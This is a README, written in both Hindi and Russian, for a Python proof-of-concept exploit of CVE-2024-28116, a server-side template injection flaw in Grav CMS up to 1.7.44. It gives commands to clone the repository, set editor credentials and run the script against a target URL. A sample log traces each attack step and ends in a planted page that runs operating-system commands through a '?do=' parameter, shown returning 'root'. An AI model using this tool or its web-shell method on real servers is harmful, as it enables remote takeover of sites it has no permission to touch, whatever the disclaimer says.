
एक PoC Python script है जो Grav CMS संस्करणों <= 1.7.44 (CVE-2024-28116) में प्रमाणित सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) कमजोरी का शोषण करती है।
GenGravSSTIExploit एक PoC Python स्क्रिप्ट है जो Grav CMS संस्करण <= 1.7.44 (CVE-2024-28116) में एक प्रमाणित सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) कमजोरी का शोषण करती है। यह कमजोरी संपादक अनुमतियों वाले उपयोगकर्ता को दूरस्थ सर्वर पर OS कमांड निष्पादित करने की अनुमति देती है।
नोट: इस स्क्रिप्ट को Grav CMS कंसोल पर प्रमाणित होने के लिए वैध क्रेडेंशियल्स की आवश्यकता है।
requests लाइब्रेरी (pip install requests से इंस्टॉल करें)रिपॉजिटरी क्लोन करें
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
क्रेडेंशियल्स कॉन्फ़िगर करें
अपने Grav CMS संपादक क्रेडेंशियल्स प्रदान करने के लिए स्क्रिप्ट को संपादित करें:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
स्क्रिप्ट चलाएँ
स्क्रिप्ट चलाने के लिए निम्नलिखित कमांड का उपयोग करें:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: http[s]://hostname प्रारूप में लक्ष्य URL।<PORT>: पोर्ट नंबर (डिफ़ॉल्ट 80)।उदाहरण:
python GenGravSSTIExploit.py -t http://example.com -p 8080
एक्सप्लॉइट के साथ इंटरेक्ट करें
यदि एक्सप्लॉइट सफल होता है, तो आपको एक URL मिलेगा जहाँ आप OS कमांड निष्पादित कर सकते हैं:
[+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
स्क्रिप्ट प्रत्येक चरण को निष्पादित करेगी और टर्मिनल के माध्यम से आपको अपडेट प्रदान करेगी। यहाँ आप क्या देख सकते हैं:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
स्क्रिप्ट समाप्त होने के बाद, आपको इंजेक्ट किए गए पेज का लिंक दिखाई देगा। आप OS कमांड निष्पादित करने के लिए इस लिंक पर जा सकते हैं:
http://example.com:8080/poc_4T7B?do=whoami
निर्दिष्ट कमांड के साथ URL पर जाने से आउटपुट सीधे पेज पर प्रदर्शित होगा:
Cmd-Output:
root
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जहाँ आपके पास स्पष्ट अनुमति है। लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।
GenGravSSTIExploit — это PoC скрипт на Python , эксплуатирующий аутентифицированную уязвимость SSTI (Server-Side Template Injection) в Grav CMS версий <= 1.7.44 (CVE-2024-28116). Эта уязвимость позволяет пользователю с правами редактора выполнять команды ОС на удаленном сервере.
Примечание: Скрипт требует действительных учетных данных для авторизации в админ-панели Grav CMS.
requests (установить через pip install requests)Клонируйте репозиторий
git clone https://github.com/geniuszly/GenGravSSTIExploit
cd GenGravSSTIExploit
Настройте учетные данные
Отредактируйте скрипт и введите учетные данные редактора Grav CMS:
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
Запустите скрипт
Используйте следующую команду для запуска скрипта:
python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
<TARGET_URL>: Целевой URL в формате http[s]://hostname.<PORT>: Номер порта (по умолчанию 80).Пример:
python GenGravSSTIExploit.py -t http://example.com -p 8080
Взаимодействие с эксплойтом
Если эксплойт прошел успешно, вы получите URL, где сможете выполнить команды ОС:
[+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
python GenGravSSTIExploit.py -t http://example.com -p 8080
Скрипт будет выполнять каждый шаг, предоставляя вам обновления через терминал. Вот что вы можете увидеть:
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
После завершения работы скрипта вы увидите сообщение со ссылкой на внедренную страницу. Вы можете перейти по этой ссылке для выполнения команд:
http://example.com:8080/poc_4T7B?do=whoami
Посещение URL-адреса с помощью указанной команды приведет к отображению вывода прямо на странице:
Cmd-Output:
root
Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на системах, где у вас есть явное разрешение. Автор не несет ответственности за любое злоупотребление или ущерб, вызванный этим скриптом.